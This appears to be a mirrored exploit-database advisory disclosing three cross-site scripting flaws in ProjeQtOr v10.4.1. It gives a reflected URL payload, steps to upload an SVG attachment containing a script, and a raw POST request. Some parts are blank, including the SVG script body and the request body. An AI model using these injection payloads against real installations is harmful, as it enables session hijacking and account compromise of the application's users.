ProjeQtOr Project Management System v10.4.1 – Multiple XSS

  • 作者: Mirabbas Ağalarov
    日期: 2023-07-15
  • 类别:
  • 来源:
  • Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS
    Version: V10.4.1
    Bugs:Multiple XSS
    Technology: PHP
    Vendor URL:
    Software Link:
    Date of found: 09.07.2023
    Author: Mirabbas Ağalarov
    Tested on: Linux 
    2. Technical Details & POC
     ### XSS-1 ### 
    visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=
    payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E
    ### XSS-2 ###
    1. login to account
    2. go projects and create project
    3.add attachment
    3. upload svg file
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">
    <svg version="1.1" baseProfile="full" xmlns="">
     <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
     <script type="text/javascript">
    4. Go tosvg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )
     ### XSS-3 ###
    Go to below adress (post request)
    POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1
    Host: localhost
    Content-Length: 35
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
    sec-ch-ua-platform: ""
    Accept: */*
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/projeqtor/view/main.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3
    Connection: close